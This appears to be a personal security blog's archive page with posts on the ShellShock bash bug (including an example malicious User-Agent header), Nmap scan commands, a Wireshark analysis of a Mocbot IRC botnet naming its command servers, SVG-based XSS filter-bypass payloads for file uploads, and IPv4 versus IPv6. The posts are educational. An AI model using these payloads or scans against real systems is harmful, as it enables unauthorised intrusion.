Network

Bash : ‘ShellShock’ Vulnerabilty

Posted by R.Dunne on September 25, 2014
Posted in: Bash : 'Shell Shock' Vulnerabilty, Network. Tagged: , , , , , , , . Leave a comment

Picture1Stephane Chazelas discovered a vulnerability in bash, related to how environment variables are processed: trailing code in function definitions was executed, independent of the variable name.

This vulnerability in bash allows an adversary who can pass commands to bash to execute arbitrary code.  As bash is a common shell for evaluating and executing commands from other programs, this vulnerability may affect many applications that evaluate user input, and call other applications via a shell, which impacts any system that uses a vulnerable bash.

It wasn’t long until the bug was patched. CloudFlare, “We got 95 percent of it done within 10 minutes,”.

Overview

Vulnerability Summary for CVE-2014-6271

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.

HashTrackIng – @hashtracking

According to @hashtracking Hashtag Explorer, #bashbug generated 1,325,325 impressions with 906 tweets recently.

HashTrack 1

According to @hashtracking Hashtag Explorer, #bash generated 4,384,129 impressions with 1,500 tweets recently.

HashTrack 2

According to @hashtracking Hashtag Explorer, #ShockShell generated 5,593 impressions with 5 tweets recently.

HashTrack 3

Impact

Shellshock could allow hackers to run any command desired on a remote system. The immediate access they gain will depend on the configuration of these systems.

Vulnerability Type: OS Command Injections (CWE-78)
CVSS Severity (version 2.0):
CVSS v2 Base Score: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C) (legend)
Impact Subscore: 10.0
Exploitability Subscore: 10.0
CVSS Version 2 Metrics:
Access Vector: Network exploitable
Access Complexity: Low
Authentication: Not required to exploit
Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service

Everything you need to know about CVE-2014-6271 – Garage4Hackers

CGI parses certain HTTP paramaters as environment variables.

For example ,

HTTP_COOKIE The visitor’s cookie, if one is set
HTTP_HOST The hostname of the page being attempted
HTTP_REFERER The URL of the page that called your program
HTTP_USER_AGENT The browser type of the visitor

GET /cgi-bin/script HTTP/1.1 
User-Agent: () { :;}; echo aa>/tmp/hacked 

Here Bash when parsing the environment variables would now parse User-Agent () as a function name and rest the function definition and then the payload

User-Agent: ()       <-- Treated as function 
{ :;};               <-- Function Definition  
echo aa>/tmp/hacked  <-- Extra payload 
Pic 1

Web Application:

Possible to exploit by code that passes through the Bash interpreter. CGI’s and CGI scripts are the most affected, but anything passed to the Bash is exploitable. Command execution can be achieved through HTTP Headers and POST/GET parameters.

A firewall is recommended to monitor the vulnerability in its headers and a signature will be added to the POST/GET field., that can monitor for attempts to bypass the detection signature via multiple white-space using ( ){ command  and  ( )  {  command  and (  )    {.

How to verify you have the vulnerability on your server:

Run each line exactly.  If  “vulnerable” appears  you’re vulnerable.

  1. ~$ export badvar='() { :;}; echo vulnerable’
  2. :~$ bash -c “echo I am an innocent sub process in ‘$BASH_VERSION’”
  3. vulnerable
  4. Specific Version
 Kali Linux Vulnerable:

To determine run the following command:

Kali

If you see the words vulnerable Kali’ then you are at risk.

Exploring bash vulnerability CVE-2014-6271.ipynb – rgbkrk

https://gist.github.com/rgbkrk/b55597a4d98c69b56692

Nmap & Zenmap

Posted by R.Dunne on March 24, 2014
Posted in: Network, Nmap & Zenmap, Tools. Tagged: , , , . Leave a comment

Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan single hosts nmapand large networks.

Zenmap is the official Nmap Security Scanner GUI that aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.

Nmap is a very powerful utility that can be used to:

  • Detect the live host on the network (host discovery)
  • Detect the open ports on the host (port discovery or enumeration)
  • Detect the software and the version to the respective port (service discovery)
  • Detect the operating system, hardware address, and the software version
  • Detect the vulnerability and security holes (Nmap scripts)

It is available for both the command line interface and the graphical user interface. Once the exe or ZIP file is downloaded from http://nmap.org/download.html during installation there is an option to either install NMAP as a GUI or the command line interface.

Simply deselect GUI if you wish for the command line interface, which is recommended as you are actually writing the commands yourself.

If you are a beginner then the GUI is a great place to start as it helps a lot with writing the desired commands for you as you can simply select what you wish it to do.

Pic 2

Once the command line version is download and installed open up the Cmd navigate to the folder like below. This is were all the command will then be carried out.

Pic 1

Nmap Help

  • nmap –help

Lists all the possible commands to help with the following;

  • TARGET SPECIFICATION
  • HOST DISCOVERY
  • SCAN TECHNIQUES
  • PORT SPECIFICATION AND SCAN ORDER
  • SERVICE/VERSION DETECTION
  • SCRIPT SCAN
  • OS DETECTION
  • TIMING AND PERFORMANCE
  • FIREWALL/IDS EVASION AND SPOOFING
  • OUTPUT
  • MISC
  • EXAMPLES

Pic 7

Export to File

-help is just an example this can be used for any scan.

  • nmap –help > C:\namp.txt

Pic 8

Target address URL or IP Address.

  • nmap  Target

Results will outline the following:

Pic 6

Scan a number of specific ports

  • nmap -p80,21,23 Target

Multiple Targets

  • nmap -O Target1 Target2

Enable OS and version detection

Script scanning, and traceroute; -T4 for faster execution

  •  nmap -A -T4 Target

Find if host/network is protected by a firewall

  • nmap -sA Target

Scan a host when protected by the firewall

  • nmap -PN Target

Scan a range of IP address using a wildcard

  • nmap 192.168.1.*

Entire subnet

  • nmap 192.168.1.0/24

Exclude hosts from a scan

  • nmap 192.168.1.0/24 –exclude 192.168.1.5
  • nmap 192.168.1.0/24 –exclude 192.168.1.5,192.168.1.254

Some Examples of Scans

-sS TCP SYN scan

Half-open scanning because this technique allows Nmap to get information from the remote host without the complete TCP handshake process, Nmap sends SYN packets to the destination, but it does not create any sessions, As a result, the target computer can’t create any log of the interaction because no session was initiated, making this feature an advantage of the TCP SYN scan.

  • onmap -sS Target

-sT (TCP connect scan)

Is the default TCP scan type when SYN scan is not an option?

Instead of writing raw packets as most other scan types do, Nmap asks the underlying operating system to establish a connection with the target machine and port by issuing the connect system call. Rather than read raw packet responses off the wire, Nmap uses this API to obtain status information on each connection attempt.

  • nmap -sT Target

-sU (UDP scans)

Sends a UDP packet to every targeted port and a service will respond with a UDP packet, proving that it is open. Common ports such as 53 and 161. Possibilities to speed up UDP scans up include scanning more hosts in parallel, doing a quick scan of just the popular ports first, scanning from behind the firewall, and using –host-timeout to skip slow hosts.

  • nmap -sU Target

Alternative to the TCP and UDP protocols, combining most characteristics of TCP and UDP, and also adding new features like multi-homing and multi-streaming.

  • nmap -sY Target

-sA (TCP ACK scan)

Used to map out firewall rulesets, determining whether they are stateful or not and which ports are filtered.

  • nmap -sA Target

-sO (IP protocol scan)

Allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by target machines.

  • -sO (IP protocol scan)

Zenmap GUI Interface

Zenmap allows interactive creation of Nmap command lines by select the different point and click approach.

Running a scan is as simple as typing the target in the “Target” field, selecting the “Intense scan” profile, and clicking the “Scan” button.

Pic 4

Once the Target and the Profile is selected the Command text-area will outline the Nmap command that is about to be run. This command could also be copied out and used in the Nmap command line interface.

Intense Scan

nmap -T4 -A -v testSite.com

Slow comprehensive scan

nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 –script “default or (discovery and safe)” testSite.com

Pic 5

The Profile Editor

Possible to use the profile editor as an Nmap command editor. Select “New Profile or Command” from under the “Profile” menu or use the ctrl+P keyboard shortcut. The profile editor will appear, displaying whatever command was shown in the main window.

Pic 10Within the Scripting Tab its possible to Scroll the list on the left to see all the scripts that are installed in the script.db, Scripts can be selected or deselected individually by clicking the check-box next to the script name.

Pic 13

To save the Profile 1st go to the “Profile” tab and give a name to the profile. Then click “Save Changes” to save the new profile.

Pic 11

The newly created Profile will then be saved and can then be selected as a scan option in future.

Pic 12

Conclusion

Nmap is a must have tool for Network Security Experts. It supports many of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. Ability to scan huge networks containing hundreds of thousands of machines and most importantly it allows for both the traditional command line and graphical (GUI) versions.

WireShark – Examining Network Traffic to/from Bot-Infected Host

Posted by R.Dunne on March 7, 2014
Posted in: Network, WireShark - Examining Network Traffic to/from Bot-Infected Host. Tagged: , , . Leave a comment

Introduction

Wireshark

Analyze unique communications to/from a bot-infected host, reassembles an IRC communication over a non-standard port, and identifies what bot is on the infected host and spot unusual DNS replies..

This analysis is carried out using WireShark, a network analysis tool formerly known as Ethereal, captures packets in real time and displays them in human-readable format. Wireshark includes filters, color-coding and other features that let you dig deep into network traffic and inspect individual packets.

TCP Handshake

TCP threeway handshake is used for initiating a connection.

The TCP three-way handshake in Transmission Control Protocol (also called the TCP-handshake; three message handshake and/or SYN-SYN-ACK) is the method used by TCP set up a TCP/IP connection over an Internet Protocol based network. TCP’s three way handshaking technique is often referred to as “SYN-SYN-ACK” (or more accurately SYN, SYN-ACK, ACK) because there are three messages transmitted by TCP to negotiate and start a TCP session between two computers. The TCP handshaking mechanism is designed so that two computers attempting to communicate can negotiate the parameters of the network TCP socket connection before transmitting data – See more at:

The unusual thing about this is that for these handshakes they are not being completed. After investigating the traffic I noticed there is no SYN ACK packet or reset packet and did not expect to get back an ICMP packet Destination unreachable (Port unreachable) instead.

tcp[13]==02                    tcp[13]==12            tcp.port==80                      tcp.stream eq 0

tcp.seq==1 && tcp.ack==1 && tcp.len==0 && (tcp.window_size_scalefactor ge 0 or tcp.window_size_scalefactor eq -2)

From analyzing the trace file it is possible to identify a number of devices been scanned by the 10.129.211.13 and it is also possible to see the Ports that these are going out too, netbios.ssn port 139.

pic 1

pic 2DNS

Domain Name System (DNS) is the system used to resolve store information about domain names including IP addresses, mail servers, and other information.

TCP/UDP: Typically, DNS uses TCP or UDP as its transport protocol. The well known TCP/UDP port for DNS traffic is 53.

DNS Request

  • Show only the DNS based traffic filter: DNS
  • You cannot directly filter DNS protocols while capturing if they are going to or from arbitrary ports. However, DNS traffic normally goes to or from port 53 and traffic to and from that port is normally DNS traffic, so you can filter on that port number.  Filter: port 53

pic 3Request 1 shows a standard DNS request to bbjj.househot.com.

  • 10.129.211.13 is the Bot infected host.

Using the simple DNS Filter noted abive to separate its Traffic and make it more manageable.

  • Standard DNS Request shows it is connecting to bbjj.househot.com.

pic 4Destination: Watchgua_04:f8:35 (00:90:7f:04:f8:35) & Source: DellEsgP_58:93:fa (00:0b:db:58:93:fa).

pic 5

pic 6After investigation I found out that this is a malicious Mocbot IRC Bot (MS06-040) that allows Remote Code Execution and Local Elevation of Privilege on a Microsoft Windows system.

  • The C&C servers, bnjj.househot.com and ypgw.wallloan.com have been published in most write-ups of Mocbot. But, even if we know the correct port number for the IRC server (18067), it is inadvisable to simply connect to the server using a standard IRC client.
  • Through AOL IM Sending a malicious Web site to the address book list.
    Attempt by others through social engineering trick HTTP Download a malicious file execution Row.
  • Connected to a specific IRC Server, Issued instructions to wait for hackers
    bbjj.househot.com
    ypgw.wallloan.com

pic 7DNS Response

  • The DNS reply for bbjj.househot.com – notice the CNAME (canonical
    name, or alias) entry in the DNS response field and look at how many IP addresses are
    associated with that name. Not the typical DNS response you’d expect and sign that the host
    being located may be a malicious one.

pic 8

It’s saying that the alias is ypgw.wallloan.com.

  • dns.resp.type == CNAME
  • Within the Response its shows that it contains 12 answer RRS which is strange, also after expanding the answers tab it lists a large amount of IP addresses assigned to ypgw.wallloan.com, which looks like a lot of IRC Servers.

pic 9

Illegal Ping Packets

Many network discovery tools and OS fingerprinting tools (such as Nmap, NetScanTools and Xprobe) send out illegally-formed ping (ICMP Echo Request packets) that can be used to ID the application in use.

Receiving a high number of ICMP traffic. This could be a primitive attempt at DDoS.

Internet Control Message Protocol uses ICMP to transfer control messages between IP hosts. ICMP is part of IP and uses IP datagram’s for transport. The assigned protocol number for ICMP on IP is 1.

Show only the ICMP based traffic: icmp

pic 10The payload of ICMP Echo Request (ping) packets to see if there is a signature for the application running sending the ICMP Echo Request.

pic 11Follow TCP Stream & Manual Investigate Stream

  • Possibility to get the information you need to spy on the C&C without being spotted is to run the bot in a sandnet, and let it connect to a fake IRC server first. Then use the credentials to log in to the real server.
  • Ability to then use telnet to connect to the C&C server on port 18067 and spy on the control channel

pic 12Follow TCP Stream

  • Helpful to see the data from a TCP stream in the way that the application layer sees it.
  • Simply select a TCP packet in the packet list of the stream/connection you are interested in and then select the Follow TCP Stream menu item from the WireShark Tools menu (or use the context menu in the packet list). WireShark will set an appropriate display filter and pop up a dialog box with all the data from the TCP stream laid out in order
  • Port: 18067.  Right click on the Packet and select the option to follow its stream or use the more complex approach of carrying out manual verification of each stream.

pic 13

  • Client data is in red and Server data is in blue.
  • For Mocbot, we use the sandnet to obtain the following IRC login sequence generated by the bot:

pic 14Follow TCP Stream

  • Previous outlined 216.234.235.165 as the 1st IP associated with the Bot. This is then the 1st infected host that the Bot tried to carry out a TCP handshake with.

pic 15The TCP Request goes out and an ICMP packet Destination unreachable (Port unreachable) comes back instead of a TCP SYN ACK or a Reset.

  • It then gives up and goes after the Canonical Name.

pic 16The Response for this DNS Request shows a high number of asnwers containing IRC Comand & Control Servers and contains a SYN ACK, completeing the three way handshake.

pic 17After this the client sends data up to that server using the PSH Flag. Instant delivery of data.

pic 18

pic 19Possible to exam this to find out what sort of data is been pushed.

pic 20

pic 21

pic 22This tells you that the client is connecting to an IRC Server in the background.

pic 23Client tried to unsuccessfully connect to hometown.aol.com. After this it started scanning.

  • Outcome of Investigation.
    • A bbjj.househot.com
    • CNAME: ypgw.wallloan.com
    • Port: 1087
    • Target IP’s from DNS Requests
    • User l l l l
    • NI CK P8-00 196671

Prepare Filter

Prepare a filter; create a filter based on specific packet data.

Prepare a filter using the 2nd Request that contains Answer RRs: 12.

  • Simply right Click on the Answer RRs: 12 and select prepare filter.
  • Change the ==12 to greater than 5 to determine an above average results.
  • dns.count.answers gt 5
  • Found another DNS Request containing Answer RRs: 11.

Coloring

A very useful mechanism available in WireShark is packet colorization. You can set-up Wireshark so that it will colorize packets according to a filter. This allows you to emphasize the packets you are (usually) interested in.

  • Highlight the filter and select edit colors.

pic 25Choose a bright foreground and background.

pic 26Filter will now make it extremely hard to miss these kinds of malicious communications if a host on the network does become infected again.

pic 27

IO Graph

The below image is the configurable graph of the captured network packets.

The user can configure the following things:

  • Graphs
    • Graph 1-5: enable the specific graph 1-5 (only graph 1 is enabled by default)
    • Color: the color of the graph (cannot be changed)
    • Filter: a display filter for this graph (only the packets that pass this filter will be taken into account for this graph)
    • Style: the style of the graph (Line/Impulse/FBar/Dot)
  • X Axis
    • Tick interval: an interval in x direction lasts (10/1 minutes or 10/1/0.1/0.01/0.001 seconds)
    • Pixels per tick: use 10/5/2/1 pixels per tick interval
    • View as time of day: option to view x direction labels as time of day instead of seconds or minutes since beginning of capture
  • Y Axis
    • Unit: the unit for the y direction (Packets/Tick, Bytes/Tick, Bits/Tick, Advanced…) [XXX – describe the Advanced feature.]
    • Scale: the scale for the y unit (Logarithmic,Auto,10,20,50,100,200,500,…)

The save button will save the currently displayed portion of the graph as one of various file formats.

The copy button will copy values from selected graphs to the clipboard in CSV (Comma Separated Values) format.

Each type of traffic was added to the filter for 3 graphs. Color was altered; tick interval was set to 1 sec, Pixel per tick 10 and scale 200.

pic 28Statistics

WireShark provides a wide range of network statistics.

These statistics range from general information about the loaded capture file (like the number of captured packets), to statistics about specific protocols (e.g. statistics about the number of HTTP requests and responses captured).

  • File: general information about the capture file.
  • Time: the timestamps when the first and the last packet were captured (and the time between them).
  • Capture: information from the time when the capture was done (only available if the packet data was captured from the network and not loaded from a file).
  • Display: some display related information.
  • Traffic: some statistics of the network traffic seen. If a display filter is set, you will see values in the Captured column, and if any packages are marked, you will see values in the Marked column. The values in the Captured column will remain the same as before, while the values in the Displayed column will reflect the values corresponding to the packets shown in the display. The values in the Marked column will reflect the values corresponding to the marked packages.

pic 29

Technical Details

W32/IRCBot.EX provides unauthorized access to an infected computer and also has the capability to spread to remote computers using the PnP exploit on port 445.

The backdoor’s file is a PE executable file about 8 kilobytes long, packed with MEW file compressor and patched with PE_Patch. The code of backdoor is encrypted with a simple crypto algorithm.

IRCBot.EX was found on August 17th, 2005 and is very similar to the IRCBot.ES variant found 2 days earlier.

The server name is known: Mocbot connects on TCP port 18067, bjj.househot.com as well as ypgw.wallloan.com, if the first server is unavailable. It involves same IRC server that used the original Mocbot variants.

Then the backdoor joins an IRC channel called ‘#p4’ using the hardcoded password and creates a bot there. A remote hacker can control a backdoor via a bot that it creates in the ‘#p4’ channel. A hacker can do any of the following:

  • Scan for vulnerable computers and spread to them using PnP exploit
  • Download and run files on an infected computer
  • Find files on local hard disks
  • Perform DDoS (Distributed Denial of Service) attack
  • Perform SYN and UDP flood

Prevention

  • Deploy IPS System.
  • Regular vulnerability scanning.
  • Analytic application layer packet contents can identify and block suspicious IRC Login and connection behavior Management IM/P2P Use.
  • Reduce the proliferation of malicious software pipeline isolating infected computers.
  • Install patches.
  • Antivirus software installed on the host side.
  • Strengthen the host side protection.
  • Strengthen user information security awareness education.
  • Don’t open any Email Attachments.

Conclusion

WireShark provides a rich set of features which can be used by Network Analysts, Administrators, Security Analysts and anyone who is curious to learn about networking. Utilizing these features allow us to effectively understand, troubleshoot and make our network(s) more secure.

Within this Assignment WireShark was used to analyze network traffic to/from bot-infected host, reassembles an IRC communication over a non-standard port and identify what bot is on the infected host and spot unusual DNS replies.

Research was also carried out to provide how this botnet could have infected the host and identified multiple way of preventing it from reoccurring.

SVG – Firefox & Chrome XSS Filter Bypass

Posted by R.Dunne on February 5, 2014
Posted in: Network. Leave a comment

Picture1

If an Application has a file upload feature it may leave it open to a Stored XSS attack.

Below outlines the possibility only using FireFox. Using the links below you can see more on this topic and also the Chrome bypass.

A really great Bypass by Alex Inführ.Picture2

Can be categorized as either of the following:

File Upload Vulnerability: This vulnerability can make the website vulnerable to some other types of attacks such as XSS.

Stored Cross-Site Scripting: If the web application allows file upload, it is important to check if it is possible to upload HTML content. For instance, if HTML or TXT files are allowed, XSS payload can be injected in the file uploaded.

The Vulnerability takes advantage of the SVG and the <use> elements wit Firefox.

FireFox Bypass

Uses the data: url scheme.
It requires the correct mime-type, which is image/svg+xml
The mime-type is either followed by the payload or by the keyword base64. It specifies, that the data is base64 encoded, which helps avoiding problems breaking the HTML structure.

Save each piece of code to text files. Below shows 2 attack vectors that can be used, Vector1 needing a user interaction and Vector2 needing no interaction at all.

Each file will then be uploaded to the Web Site create an XSS Vulnerability.

Vector 1: – User Interaction Needed

The browser will display a black rectangle, which will alert the location when clicked.

data: scheme

Base64 Payload

Save As test.html

<svg>
<use xlink:href="data:image/svg+xml;base64,
PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDo
vL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW
5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rI
iAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+DQo8
YSB4bGluazpocmVmPSJqYXZhc2NyaXB0OmFsZXJ0KGx
vY2F0aW9uKSI+PHJlY3QgeD0iMCIgeT0iMCIgd2lkdG
g9IjEwMCIgaGVpZ2h0PSIxMDAiIC8+PC9hPg0KPC9zd
mc+#rectangle" />
</svg>

Decoded Base64 Payload

This gives a look at what the Base64 malicious file actually contains.

See that the <a xlink:href=” is referencing the malicious payload.

<svg id="rectangle" 
xmlns="http://www.w3.org/2000/svg" 
xmlns:xlink="http://www.w3.org/1999/xlink"
width="100" height="100">
<a xlink:href="javascript:alert(location)">
<rect x="0" y="0" width="100" height="100" />
</a>
</svg>

Vector2 – No User Interaction Needed

To not have this interaction of the victim having to click anything.
Once opened in Firefox, it will alert the location.

data: scheme

Base64 Payload

Save As test.html

<svg>
<use xlink:href="data:image/svg+xml;base64,
PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cD
ovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhs
aW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW
5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3
JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0i
NTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZW
RFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8x
OTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dH
A6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0i
amF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+DQ
ogICAgPC9mb3JlaWduT2JqZWN0Pg0KPC9zdmc+#rectangle" />
</svg>

Decoded Base64 Payload

Again this gives a look at what the Base64 malicious file actually contains.

See that the <a xlink:href=” is referencing the malicious payload.

<svg id="rectangle"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
width="100" height="100">
<script>alert(1)</script>
<foreignObject width="100" height="50"
requiredExtensions="http://www.w3.org/1999/xhtml">

</foreignObject>
</svg>

IPV4 & IPV6

Posted by R.Dunne on July 17, 2013
Posted in: IPV4 & IPV6, Network. Tagged: , , , , . Leave a comment

IPV4

  • Current version of Internet Protocol is IPv4.
  • Used to send data over the Internet and makes interaction between different services possible.
  • Over the years, as response to these deficiencies and in consideration of a global network in rapid growth, new technologies, like SSL/TLS and IPSec, have been introduced to remedy these issues.
  • Example Address: 69.89.31.226

Limitations – IPV4

1.  Maximum addressing space – uses 32-bit address space.

  • Scarcity of IPv4 addresses, many organizations implemented NAT to map multiple private addresses to a single public IP address.
  • NAT does not support network layer security standards and it do not support the mapping of all upper layer protocols.
  • More servers, workstations and devices which are connected to the internet also demand the need for more addresses and the current statistics prove that public IPv4 address space will be depleted soon.

2. Security Related Issues:

  • IPv4 was published in 1981 and the current network security threats were not anticipated that time
  • Internet Protocol Security (IPSec) is a protocol suit which enables network security by protecting the data being sent from being viewed or modified. IPSec provides security for IPv4 packets, but IPSec is not built-in and is optional.

3. Quality of Service QoS:

  • IPv4 and it relies on the 8 bits of the IPv4 Type of Service (TOS) field and the identification of the payload.
  • IPv4 Type of Service (TOS) field has limited functionality and payload identification (uses a TCP or UDP port) is not possible when the IPv4 packet payload is encrypted.

Next Generation – IPV6

  • IPv6 addresses are based on 128 bits.
  • Sites should run a dual-stack IPv6 configuration.
  • Otherwise you could miss traffic from users who are only able to access the Internet over IPv6 (which is not backwards compatible with IPv4).
  • Small amount running IPV6 but will increase.
  • Only takes one missed customer to make you regret not taking the steps to incorporate IPv6 into your infrastructure.
  • Example Address: 2002:4559:1FE2::4559:1FE2

Benefits

  • IPv6 reduces the size of routing tables and makes routing more efficient and hierarchical.
  • Allows ISPs to aggregate the prefixes of their customers’ networks into a single prefix and announce this one prefix to the IPv6 Internet.
  • IPv6’s simplified packet header makes packet processing more efficient.
  • Compared with IPv4, IPv6 contains no IP-level checksum, so the checksum does not need to be recalculated at every router hop.
  • Multicast rather than broadcast.
  • Allows bandwidth-intensive packet flows to be sent to multiple destinations simultaneously, saving network bandwidth.
  • Address auto-configuration (address assignment) is built in to IPv6.
  • Router will send prefix of the local link in its router advertisements.
  • Host can generate its own IP by appending its link-layer (MAC) address, converted into Extended Universal Identifier (EUI) 64-bit format, to the 64 bits of the local link prefix.
  • Eliminating NAT, true end-to-end connectivity at the IP layer is restored, enabling new and valuable services.
  • Peer-to-peer networks are easier to create and maintain, and services such as VoIP and Quality of Service (QoS) become more robust.
  • IPSEC-  provides confidentiality, authentication and data integrity, is part IPv6.
  • Because of their potential to carry malware, IPv4 ICMP packets are often blocked by corporate firewalls, but ICMPv6, the implementation of the Internet Control Message Protocol for IPv6, may be permitted because IPSec can be applied to the ICMPv6 packets.
  • The Secure Neighbour Discovery (SEND) protocol is capable of enabling cryptographic confirmation that a host is who it claims to be at connection time.
  • Renders Address Resolution Protocol (ARP) poisoning and other naming-based attacks much more difficult.

IP